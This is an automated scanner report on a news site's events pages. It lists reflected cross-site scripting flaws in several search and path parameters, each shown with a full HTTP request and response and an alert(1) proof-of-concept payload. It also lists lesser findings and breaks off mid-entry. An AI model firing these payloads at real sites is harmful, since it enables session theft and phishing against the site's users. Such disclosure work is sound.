XSS, events.ocregister.com, Cross Site Scripting

XSS in events.ocregister.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:30:07 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://events.ocregister.com/ [name of an arbitrarily supplied request parameter]

1.2. http://events.ocregister.com/json [jsonsp parameter]

1.3. http://events.ocregister.com/movies [name of an arbitrarily supplied request parameter]

1.4. http://events.ocregister.com/restaurants [name of an arbitrarily supplied request parameter]

1.5. http://events.ocregister.com/search [st_select parameter]

1.6. http://events.ocregister.com/search [st_select parameter]

1.7. http://events.ocregister.com/search [st_select parameter]

1.8. http://events.ocregister.com/search [st_select parameter]

1.9. http://events.ocregister.com/search [svt parameter]

1.10. http://events.ocregister.com/search [swhat parameter]

1.11. http://events.ocregister.com/search [swhat parameter]

1.12. http://events.ocregister.com/search [swhen parameter]

1.13. http://events.ocregister.com/search [swhere parameter]

1.14. http://events.ocregister.com/venues [name of an arbitrarily supplied request parameter]

1.15. http://events.orangecounty.com/ [name of an arbitrarily supplied request parameter]

1.16. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [REST URL parameter 5]

1.17. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [name of an arbitrarily supplied request parameter]

2. Session token in URL

3. Cross-domain Referer leakage

4. Cross-domain script include

4.1. http://events.ocregister.com/

4.2. http://events.ocregister.com/movies

4.3. http://events.ocregister.com/restaurants

4.4. http://events.ocregister.com/search

4.5. http://events.ocregister.com/venues

4.6. http://events.orangecounty.com/

4.7. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

5. Cookie without HttpOnly flag set

5.1. http://events.ocregister.com/json

5.2. http://events.orangecounty.com/

6. Email addresses disclosed

7. HTML does not specify charset

7.1. http://fastfood.ocregister.com/files/2010/04/OMG_BurgerSLIDE-SHOW-150x112.jpg

7.2. http://fastfood.ocregister.com/files/2010/05/Hans-Homemade-Ice-Cream_web-150x112.jpg

7.3. http://fastfood.ocregister.com/files/2010/09/Zagat_BestDining2011-150x112.jpg

7.4. http://fastfood.ocregister.com/files/2010/12/FoodMontage-150x150.jpg

7.5. http://fastfood.ocregister.com/files/2010/12/blog_fastfood_mug_rh.png

7.6. http://fastfood.ocregister.com/files/2011/01/JWA-montage-150x64.jpg

7.7. http://fastfood.ocregister.com/files/2011/01/fastfood_cheapchic.png

7.8. http://fastfood.ocregister.com/files/2011/01/fastfood_jack.png

7.9. http://fastfood.ocregister.com/files/2011/01/fastfood_twitter.png

7.10. http://fastfood.ocregister.com/files/2011/01/image001-300x245.jpg

7.11. http://fastfood.ocregister.com/files/2011/01/taco_asylum_web-150x112.jpg

8. Content type incorrectly stated

8.1. http://events.ocregister.com/json

8.2. http://fastfood.ocregister.com/files/2010/04/OMG_BurgerSLIDE-SHOW-150x112.jpg

8.3. http://fastfood.ocregister.com/files/2010/05/Hans-Homemade-Ice-Cream_web-150x112.jpg

8.4. http://fastfood.ocregister.com/files/2010/09/Zagat_BestDining2011-150x112.jpg

8.5. http://fastfood.ocregister.com/files/2010/12/FoodMontage-150x150.jpg

8.6. http://fastfood.ocregister.com/files/2010/12/blog_fastfood_mug_rh.png

8.7. http://fastfood.ocregister.com/files/2011/01/JWA-montage-150x64.jpg

8.8. http://fastfood.ocregister.com/files/2011/01/fastfood_cheapchic.png

8.9. http://fastfood.ocregister.com/files/2011/01/fastfood_jack.png

8.10. http://fastfood.ocregister.com/files/2011/01/fastfood_twitter.png

8.11. http://fastfood.ocregister.com/files/2011/01/image001-300x245.jpg

8.12. http://fastfood.ocregister.com/files/2011/01/taco_asylum_web-150x112.jpg



1. Cross-site scripting (reflected)  next
There are 17 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://events.ocregister.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e5a"><script>alert(1)</script>8d769312283 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f9e5a"><script>alert(1)</script>8d769312283=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:15 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 36
ETag: "780885bfeb8e7922802451bddfb87c7b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlYzkxOGM4MzUxZTczYWE2NzhkNzNjNzhiNDM0ZTlhZmIiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--caf4bc8c9f78d4a14f6eb98c46966d71fd36d308; path=/; expires=Tue, 03-May-2011 19:05:15 GMT; HttpOnly
Content-Length: 65327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?f9e5a"><script>alert(1)</script>8d769312283=1" />
...[SNIP]...

1.2. http://events.ocregister.com/json [jsonsp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /json

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 89933<script>alert(1)</script>7b37a8f386f was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?jsonsp=Zvents_load_ZventsWidget189933<script>alert(1)</script>7b37a8f386f&limit=7&p=49&sid=za5509dx0r HTTP/1.1
Host: events.ocregister.com
Proxy-Connection: keep-alive
Referer: http://www.ocregister.com/templates/zventsIframe.php?domain=events.ocregister.com&c=Irvine%2CCA&template=zventsOCR.html&z=92614&p=49&r=30&t=Things+to+do+in+Orange+County
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 18:54:58 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 52
ETag: "d7c036a0dd93fed8ab5b6c1e4b9f60d9"
X-Content-Digest: 34be3dfebb38770614f9987162ba8d7ae756151c
Cache-Control: max-age=1800, public
Set-Cookie: welcome=qgbAkKCZdDi4uPN4b06Ptw.100548280; path=/; expires=Fri, 03-Feb-2012 18:54:58 GMT
Set-Cookie: zvents_tracker_sid=qgbAkKCZdDi4uPN4b06Ptw.100548280; path=/; expires=Fri, 03-Feb-2012 18:54:58 GMT
Age: 0
Content-Length: 22080

Zvents_load_ZventsWidget189933<script>alert(1)</script>7b37a8f386f('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Hair","price":"$20-$80","private":false,"editors_pick":false,"url":"http://www.scfta.org/home/Events/EventDetail.aspx?EventID=996","approv
...[SNIP]...

1.3. http://events.ocregister.com/movies [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /movies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f3e"><script>alert(1)</script>ceef51fea12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies?94f3e"><script>alert(1)</script>ceef51fea12=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 35
ETag: "c0f4f1fc3bc6259535d47d2f6f8cb72b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlMmVjZjJiZWU3YjBlM2M3MDU1OGVkNzU1ZjBlZGQwNjgiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--3e161b60fc3c855f9fa48059642bdc8dd590f651; path=/; expires=Tue, 03-May-2011 19:05:24 GMT; HttpOnly
Content-Length: 45429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies?94f3e"><script>alert(1)</script>ceef51fea12=1" />
...[SNIP]...

1.4. http://events.ocregister.com/restaurants [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /restaurants

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a3ab"><script>alert(1)</script>f73c13b2255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /restaurants?6a3ab"><script>alert(1)</script>f73c13b2255=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 32
ETag: "6be2db74288711698c669e7a4a441f54"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlYmZjOTM3OTUyZGFmODA5NzJkNGZkYzVlNTgxMWY3Y2YiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--0416affebe758d5443df7bf22fee89ccc5ebb2d5; path=/; expires=Tue, 03-May-2011 19:05:09 GMT; HttpOnly
Content-Length: 57433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/restaurants?6a3ab"><script>alert(1)</script>f73c13b2255=1" />
...[SNIP]...

1.5. http://events.ocregister.com/search [st_select parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the st_select request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 744e1"%3balert(1)//1e62870ad6d was submitted in the st_select parameter. This input was echoed as 744e1";alert(1)//1e62870ad6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event744e1"%3balert(1)//1e62870ad6d&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:09:26 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 44
ETag: "44bc00ad2514211a96a52b1d0a58abc4"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlODQwMzk0YTE3NzM0YWZjM2FhOWIwODk4ZWViNTMzMDgiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--88663952c7d141dd6941ee06454236f0b51afd35; path=/; expires=Tue, 03-May-2011 19:09:26 GMT; HttpOnly
Content-Length: 18078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
nel ="";
google_color_border = "ff9933";
google_color_bg = "FFFFFF";
google_color_link = "3366CC";
google_color_url = "3366CC";
google_color_text = "333333";
google_hints = "superbowl11 Irvine,CA event744e1";alert(1)//1e62870ad6ds";

//-->
...[SNIP]...

1.6. http://events.ocregister.com/search [st_select parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the st_select request parameter is copied into the HTML document as plain text between tags. The payload 7c80e<script>alert(1)</script>e0b48eab0cb was submitted in the st_select parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event7c80e<script>alert(1)</script>e0b48eab0cb&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:09:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 49
ETag: "77bab4dbd9d6705a99eb02a79686ff79"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlYzY3ZDI5MTI2YTYwZTViNjY1NGI5NGJjNDBmMjkzMGIiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--6eb02058b9d8e991c3b0e92b4a5c4148ea061dad; path=/; expires=Tue, 03-May-2011 19:09:31 GMT; HttpOnly
Content-Length: 18755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<div id="error_message">
Invalid search: event7c80e<script>alert(1)</script>e0b48eab0cb is not a valid search category.
</div>
...[SNIP]...

1.7. http://events.ocregister.com/search [st_select parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the st_select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f25f"><script>alert(1)</script>de56addb30 was submitted in the st_select parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event1f25f"><script>alert(1)</script>de56addb30&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:09:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 34
ETag: "06f028fda06900f1b13fd20c60054a4b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlODhmOTVmNzQ1MDU4YzUyMDBiM2I0YzY3ZWFlYTEzN2QiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--ec067a790e483d7dfe8d4b6ea1297846b4520489; path=/; expires=Tue, 03-May-2011 19:09:25 GMT; HttpOnly
Content-Length: 19030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<body id="body_event1f25f"><script>alert(1)</script>de56addb30">
...[SNIP]...

1.8. http://events.ocregister.com/search [st_select parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the st_select request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d737d'%3balert(1)//cee44e0808f was submitted in the st_select parameter. This input was echoed as d737d';alert(1)//cee44e0808f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=eventd737d'%3balert(1)//cee44e0808f&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:09:29 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 40
ETag: "1a5e0c8a97b19fe60caf34eff0246e51"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlYTQ4MTRmMjM0YTA1NWE1OWU0ZGZjYjZlZDUxMDUwZDMiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--74df95328582d01966b7282bb77a024258216284; path=/; expires=Tue, 03-May-2011 19:09:29 GMT; HttpOnly
Content-Length: 17945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<script type="text/javascript">
Zvents.tracker.notifySearchView(
'',
'',
'st=eventd737d';alert(1)//cee44e0808f&what=superbowl11&where=Irvine%2CCA&ssi=0&ssrss=5&srss=11');
</script>
...[SNIP]...

1.9. http://events.ocregister.com/search [svt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the svt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66943"><script>alert(1)</script>2a358999d52 was submitted in the svt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

